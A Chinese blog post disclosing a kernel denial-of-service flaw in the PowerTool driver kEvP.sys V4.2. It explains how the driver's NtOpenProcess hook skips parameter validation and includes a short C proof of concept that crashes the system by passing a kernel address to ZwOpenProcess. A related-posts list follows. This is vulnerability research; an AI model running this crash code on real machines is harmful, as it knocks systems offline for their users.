PowerTool kEvP.sys=V4.2 内核拒绝服务漏洞
百度百科:
PowerTool 一款免费强大的进程管理器,支持进程强制结束,可以Unlock占用文件的进程,查看文件/文件夹被占用的情况,内核模块和驱动的查看和管理,进程模块的内存的dump等功能。最新版还支持上传文件在线扫描病毒。支持离线的启动项和服务的检测和删除,新增注册表和服务的强删功能,可在PE系统下清除感染MBR的病毒(如鬼影等),通过Windows7 SP1的测试。
--------------------------------------------------------------------------------------------------------------
其在加载的时候,为了让不让恶意软件结束自身,而SSDT Hook了NtOpenProcess函数。但是未对Ring3传过来的参数做任何校验就直接使用了,因此,触发漏洞。
示例函数:FakeNtOpenProcess
偏移:ED70
IDA汇编代码如下:
正如上面的汇编代码所示,只要CID参数不为空,他就直接调用了PsLookupProcessByProcessId函数。
而PsLookupProcessByProcessId是内核函数,其自身不会对参数有任何校验:
测试代码:
/*作者:莫灰灰博客:http://blog.csdn.net/hu3167343描述:PowerTool内核拒绝服务漏洞测试程序
*/#include "stdafx.h"
#include <windows.h>int _tmain(int argc, _TCHAR* argv[])
{HMODULE hMod = LoadLibrary(L"ntdll.dll");if (hMod){PVOID p = GetProcAddress(hMod, "ZwOpenProcess");if (p){printf("Your System Will Crash, See you nala.\n");__asm{push 0x80000000push 0push 0push 0call p}}}system("pause");return 0;
}
Ps:在开启PowerTool自保护的情况下运行上面程序,系统会蓝屏重启。正常机器木有问题。
PowerTool kEvP.sys=V4.2 内核拒绝服务漏洞相关推荐
- 2345内核拒绝服务漏洞(1)
概述 已经快2个月了吧,已经忘了是什么原因突然搞起了驱动漏洞,反正就是很有兴致地想挖掘一下驱动漏洞. 在网上了解了基本的驱动漏洞挖掘方法,主要是通过ioctl接口进行挖掘,已经有很多相关fuzz工具了 ...
- 瑞星2011、2012神马的各种内核拒绝服务漏洞
看了看雪上的这篇帖子<瑞星全功能安全软件2011内核拒绝服务漏洞>http://bbs.pediy.com/showthread.php?t=151241.里面提到的驱动签名时间签名是20 ...
- 2345内核拒绝服务漏洞(3)- WORD的锅
漏洞概述 软件网址:http://safe.2345.cc/ 版本:v3.7 X64 2345安全软件的驱动2345BdPcSafe.sys在ioctl(0x0022204C)接口处理中,对输入数据校 ...
- linux内核系列远程拒绝服务漏洞,预警 | Linux 爆“SACK Panic”远程DoS漏洞,大量主机受影响...
近日,腾讯云安全中心监测到Linux 内核被曝存在TCP "SACK Panic" 远程拒绝服务漏洞(漏洞编号:CVE-2019-11477,CVE-2019-11478,CVE- ...
- 瑞星 HookCont.sys <= 24.0.0.5 驱动本地拒绝服务漏洞
漏洞详情 披露状态: 2010-07-27: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-04: 细节向第三方安全合作伙伴开放 1970- ...
- CVE-2015-3636(pingpong root) android内核 UAF漏洞分析
前言 去年差不多这个时候就计划把这个漏洞给分析了,由于android没有经常搞,所以踩了很多坑,中间一度因为各种原因停滞放弃,最近遇到一个事情让我下定决心把它了结,也算是解决一个心病.过程会写详细一点 ...
- Linux Kernel ‘_xfs_buf_find()’函数空指针引用拒绝服务漏洞
漏洞名称: Linux Kernel '_xfs_buf_find()'函数空指针引用拒绝服务漏洞 CNNVD编号: CNNVD-201303-071 发布时间: 2013-03-06 更新时间: 2 ...
- 一个内核网络漏洞详解|容器逃逸
CVE-2021-22555:一个影响2006年(Linux kernel v2.6.19-rc1 发布)至今(Linux kernel v5.12-rc8)的所有Linux内核版本的漏洞,可导致本地 ...
- Linux kernel 本地拒绝服务漏洞
漏洞名称: Linux kernel 本地拒绝服务漏洞 CNNVD编号: CNNVD-201302-387 发布时间: 2013-02-22 更新时间: 2013-02-22 危害等级: 漏洞类型 ...
最新文章
- Session——servlet
- 如何安装php网站,如何安装部署PHP网站
- 《机器学习》 周志华学习笔记第五章 神经网络(课后习题) python实现
- SAP Spartacus B2B User list页面的数据加载逻辑
- jaxb 解析list元素_JAXB和根元素
- mysql镜像压缩包使用_如何连接docker的mysql镜像
- Elasticsearch--linux网络设置 开启密码访问---全文检索引擎ElasticSearch工作笔记021
- Redhat Enterprise Linux 6 正式版已经发布!
- 分析 tuning-primer.sh 源码
- SSH KEY免密码验证
- windows下C++内存碎片的测试
- matlab imrotated,图像旋转由Matlab无需使用imrotate
- 美国电话卡原生卡和虚商卡区别
- 【知识图谱】OpenKG 发布多个新冠病毒相关开放知识图谱
- VMware 虚拟机安装黑屏问题
- 高通SDM845平台Sensor学习——3.SLPI(Physical Sensor)
- 送给你的一份英语学习资料,请查收!
- android canvas 工作流_Activiti工作流引擎使用
- 如何用计算机测试交易系统,一种自动售票机交易功能的测试系统和方法与流程...
- 关于kafka数据丢失场景的一次激烈讨论.... |文末送书